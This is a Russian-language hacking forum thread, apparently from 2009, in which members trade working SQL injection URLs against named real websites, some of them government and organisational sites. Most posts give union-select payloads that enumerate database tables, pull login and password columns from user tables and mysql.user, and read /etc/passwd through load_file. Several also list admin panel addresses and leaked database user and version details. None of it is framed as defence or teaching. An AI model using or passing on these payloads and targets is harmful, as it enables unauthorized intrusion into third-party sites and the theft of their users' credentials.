SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. Bb0y

    Bb0y Active Member

    Joined:
    30 Oct 2009
    Messages:
    116
    Likes Received:
    136
    Reputations:
    78
    http://www.yu-tour.ru/country.php?id=-9+union+select+1,2,3,4,5,6,7,8,9,10,column_name,12,13,14,15+from+information_schema.columns+where+table_name=0x6d6f64466565646261636b55736572--
    MySQL 5.0.45-log
    http://www.yu-tour.ru/country.php?id=-9+union+select+1,2,3,4,5,6,7,8,9,10,concat_ws(0x3a,login,0x3a,password),12,13,14,15+from+modFeedbackUser--
    modFeedbackUser::id:name:login:,password:,post
    http://www.yu-tour.ru/admin
    выводит все строки сразу
     
    #11101 Bb0y, 7 Nov 2009
    Last edited: 8 Nov 2009
    2 people like this.
  2. -JC-

    -JC- Member

    Joined:
    10 Mar 2009
    Messages:
    54
    Likes Received:
    18
    Reputations:
    11
    Code:
    http://www.graphicjunkiehosting.co.uk/knowledgebase/index.php?cat=1+group+by+1+union+select+1,2,version()/*
     
  3. SpYeR

    SpYeR New Member

    Joined:
    11 Nov 2007
    Messages:
    21
    Likes Received:
    2
    Reputations:
    0
    mssql 2008: http://kbaptupa.ru/dir/linkdetail.aspx?id=764+order+by+6+--



    msaccess: http://www.sectsco.org/RU/show.asp?id=304+or+1=1
    pr 7 cy 160, оф. сайт шанхайской организации сотрудничества, лол.
     
    #11103 SpYeR, 8 Nov 2009
    Last edited: 8 Nov 2009
    1 person likes this.
  4. onbka

    onbka Member

    Joined:
    29 Oct 2009
    Messages:
    8
    Likes Received:
    7
    Reputations:
    0
    wargames@localhost:Wargames:5.0.75-0ubuntu10.2


    ccg@localhost:CCG:5.0.75-0ubuntu10.2
     
    1 person likes this.
  5. KNR

    KNR Member

    Joined:
    30 Oct 2009
    Messages:
    25
    Likes Received:
    7
    Reputations:
    0
    Code:
    http://www.alfacomponent.com/index.php?id=-1+union+select+1,2,3,4,concat_ws(0x3a,database(),user(),version(),@@version_compile_os),6
    alfachip_alfacomponent:alfachip_user@localhost:4.0.27-standard:pc-linux-gnu
    Таблицу не смог найти (
     
    2 people like this.
  6. [x60]unu

    [x60]unu Banned

    Joined:
    7 May 2009
    Messages:
    98
    Likes Received:
    498
    Reputations:
    163
    theanimatedseries.890m.com -
    http://theanimatedseries.890m.com/showcomments.php?postid=1/**/and/**/1=7%20/**/union/**/all/**/select/**/1,version(),3,4,5+from+users--
    version - 5.0.81-community
    user - a1811734_madnote@localhost
    database - a1811734_imanga
    table - users (username, password)
    http://theanimatedseries.890m.com/showcomments.php?postid=1/**/and/**/1=7%20/**/union/**/all/**/select/**/1,concat_ws(0x3a,username,password),3,4,5+from+users--
    admin panel - http://theanimatedseries.890m.com/admin/
     
    5 people like this.
  7. nikp

    nikp Banned

    Joined:
    19 Sep 2008
    Messages:
    328
    Likes Received:
    591
    Reputations:
    764
    5.0.21 : rootr@localhost : % : rootr : : Y
    http://www.guerreros.com.co/guerreros/popupNoticia.php?noticia=-1+union+select+0,1,concat_ws(0x203a20,version(),user(),host,user,password,file_priv),3,4+from+mysql.user+limit+1,1--
    http://www.guerreros.com.co/guerreros/popupNoticia.php?noticia=-1+union+select+0,1,load_file(0x2f6574632f706173737764),3,4--
     
    6 people like this.
  8. Bb0y

    Bb0y Active Member

    Joined:
    30 Oct 2009
    Messages:
    116
    Likes Received:
    136
    Reputations:
    78
    http://www.yoseikan-budo.be/intranet/ViewClub.php?id=-5+union+select+1,2,3,4,5,group_concat(0x0b,column_name),7,8,9,10,11,12,13+from+information_schema.columns+where+table_name=0x64635f75736572
    dc_user::user_id:user_level:user_pwd:user_nom:user_prenom:user_pseudo:user_email:user_post_format:user_edit_size:user_pref_cat:user_lang:user_delta:user_post_pub
    MySQL 5.0.32-Debian_7etch11-log
    http://www.yoseikan-budo.be/intranet/ViewClub.php?id=-5+union+select+1,2,3,4,5,group_concat(0x0b,user_id,0x3a,user_email,0x3a,user_pwd,0x3a,user_level),7,8,9,10,11,12,13+from+dc_user
    softbb_membres::http://www.yoseikan-budo.be/intranet/ViewClub.php?id=-5+union+select+1,2,3,4,5,group_concat(0x0b,column_name),7,8,9,10,11,12,13+from+information_schema.columns+where+table_name=0x736f667462625f6d656d62726573
     
    2 people like this.
  9. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    3,619
    Likes Received:
    432
    Reputations:
    234
    http://www.painkillerz.ca/archive.php?type=-3+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+--+

    https://www.magazineburst.com/newsite/magazine.php?mag=-424+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,group_concat(table_name)+from+information_schema.tables+/*+

    http://cosmoguayana.net/galeria_prensa.php?id=-1+union+select+1,2,3,4,concat_ws(0x3a3a,login,contrasena,nombre,apellido,email,tipo,estado),6,7,8,9,10,11+from+usuarios+limit+2,1+--+

    http://www.chiroeco.com/article/chiropractic-magazine.php?id=-113+union+select+concat_ws(0x3a3a,username,password,section)+from+administrators+limit+1,10+--+
     
    3 people like this.
  10. Bb0y

    Bb0y Active Member

    Joined:
    30 Oct 2009
    Messages:
    116
    Likes Received:
    136
    Reputations:
    78
    http://yocshoppe.com/viewOrder.php?id=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,group_concat(0x0b,column_name)+from+information_schema.columns+where+table_name=0x6163636f756e7473
    accounts::userid:username:passhash:logouttime:accounttype:contact:comments
    http://yocshoppe.com/viewOrder.php?id=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,group_concat(0x0b,username,0x3a,passhash,0x3a,accounttype)+from+accounts
    MySQL 5.0.81-log
    логинимсо http://yocshoppe.com/loginAccount.php
     
    4 people like this.
  11. z00MAN

    z00MAN Banned

    Joined:
    20 Nov 2008
    Messages:
    360
    Likes Received:
    276
    Reputations:
    41
    Code:
    http://www.nolting.com/article.php?i=999+union+select+1,concat_ws(0x3a,user(),version(),database()),table_name,4+from+information_schema.tables/*
    nmdbadmin@localhost:5.0.45-community-nt:nolting

    PR: 3




    Code:
    http://odb.tamboff.ru/index.php?id=-9+union+select+unhex(hex(concat_ws(0x3a,version(),user(),database())))--&place=content
    4.1.11:оdb@localhost:оdb

    тиц=110




    Code:
    http://www.ib.ru/news/index.php?id=-999+union+select+1,concat_ws(0x3a,version(),user(),database()),2,3,5,6,7
    5.0.45-log:ib@localhost:ibnews

    ТИЦ: 425
     
    6 people like this.
  12. Bb0y

    Bb0y Active Member

    Joined:
    30 Oct 2009
    Messages:
    116
    Likes Received:
    136
    Reputations:
    78
    http://www.rusich-media.ru/data.php?mod=data&path=peretagki&num=0&id=4+union+select+1,2,concat_ws(0x3a,user,0x3a,password,0x3a,file_priv),4,5,6,7,8+from+mysql.user
    MySQL 5.0.76-log
    http://www.rusich-media.ru/data.php?mod=data&path=peretagki&num=0&id=4+union+select+1,2,load_file(0x2f6574632f706173737764),4,5,6,7,8 - Чтение файлов на серве
    http://www.rusich-media.ru/admin типа админко
     
    1 person likes this.
  13. ILYAtirtir

    ILYAtirtir Elder - Старейшина

    Joined:
    25 Apr 2007
    Messages:
    142
    Likes Received:
    246
    Reputations:
    73
    Межпарламентская Ассамблея государств - участников Содружества Независимых Государств
    Code:
    iacis:iacis@localhost:4.1.20
    Управление Федеральной регистрационной службы по Пермскому краю
    Code:
    dbfrs2:frs@localhost:4.0.24_Debian-10sarge3-log
    Управление Федеральной миграционной службы
    по Пермскому краю

    Сибирский Федеральный Округ
    ЦЕНТР ОБЩЕСТВЕННОЙ БЕЗОПАСНОСТИ - ЦЕНТУРИОН
    Информационное агентство "Федеральные Новости"
     
    5 people like this.
  14. Twoster

    Twoster Members of Antichat

    Joined:
    20 Aug 2008
    Messages:
    287
    Likes Received:
    402
    Reputations:
    159
    Проявляю активность! =)
     
    5 people like this.
  15. -JC-

    -JC- Member

    Joined:
    10 Mar 2009
    Messages:
    54
    Likes Received:
    18
    Reputations:
    11
    Code:
    http://www.southveter.ru/catalog.php?id=-1+union+select+1,2,3,4,5,6,7,8,version(),10+--+
     
  16. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    тИЦ: 130
    Code:
    http://www.rusconsult.ru/cms-news.php?mode=view_news&id=-1+union+select+1,2,3,concat_ws(0x3a,user(),database(),version()),5,6+from+cms_admin
    Code:
    [B][color="Red"]root[/color][/B]@zvm11:rusconsultru:5.0.77
    Code:
    http://www.rusconsult.ru/cms-news.php?mode=view_news&id=-1+union+select+1,2,3,concat_ws(0x3a,login,password),5,6+from+cms_admin
    Code:
    http://www.rusconsult.ru/cms-news.php?mode=view_news&id=-1+union+select+1,2,3,concat_ws(0x3a,user_login,user_pass),5,6+from+wp_users
    Code:
    http://www.rusconsult.ru/cms-news.php?mode=view_news&id=-1+union+select+1,2,3,concat_ws(0x3a,user,password),5,6+from+mysql.user
     
    #11116 mailbrush, 9 Nov 2009
    Last edited by a moderator: 9 Nov 2009
    5 people like this.
  17. [x60]unu

    [x60]unu Banned

    Joined:
    7 May 2009
    Messages:
    98
    Likes Received:
    498
    Reputations:
    163
    зарубежный хостинг :
    http://lithium-hosting.net/info.php?item=1/**/and/**/1=2%20/**/union/**/all/**/select/**/1,concat_ws(char(42,42,42),version(),database(),user(),@@version_compile_os),3/**/from/**/plans

    version - 5.0.81-community-log
    database - lithiumh_lithium
    user - lithiumh_lithium@localhost
    os - unknown-linux-gnu

    http://lithium-hosting.net/info.php?item=1/**/and/**/1=2%20/**/union/**/all/**/select/**/1,concat_ws(char(42,42,42),ftp,domains,link),3/**/from/**/plans
     
    6 people like this.
  18. SENIA

    SENIA Elder - Старейшина

    Joined:
    22 Nov 2008
    Messages:
    478
    Likes Received:
    232
    Reputations:
    1
    пр 5
    Code:
    http://www.ukrainianjournal.com/index.php?w=article&id=-9174+union+select+1,2,concat_ws(0x3a,id,login,password),4,5,6,7+from+uajournal_db.users--
    Database Version: 5.0.85-log
    Database name: uajournal_db
    User name: [email protected]
     
    9 people like this.
  19. Bramin

    Bramin Banned

    Joined:
    15 May 2009
    Messages:
    187
    Likes Received:
    88
    Reputations:
    27
    5.0.82sp1-enterprise-gpl:[email protected]:w3452267db

    4.0.27:[email protected]:know_db

    5.0.77:hotel_user@localhost:hotel_data

    4.1.20:pizziadmin@localhost:pizzibs
     
    #11119 Bramin, 9 Nov 2009
    Last edited by a moderator: 9 Nov 2009
    3 people like this.
  20. maestra_toys

    maestra_toys Banned

    Joined:
    8 Nov 2009
    Messages:
    0
    Likes Received:
    6
    Reputations:
    0
    Ребята, а зачем вы все выкладываете это?

    Если надо, то вот от меня:

    http://www.ovidiopol.com/news.php?id=1+union+select+1,2,3,concat_ws(0x3a,user(),database(),version()),5,6%20--
     
    #11120 maestra_toys, 9 Nov 2009
    Last edited by a moderator: 9 Nov 2009
    3 people like this.
Thread Status:
Not open for further replies.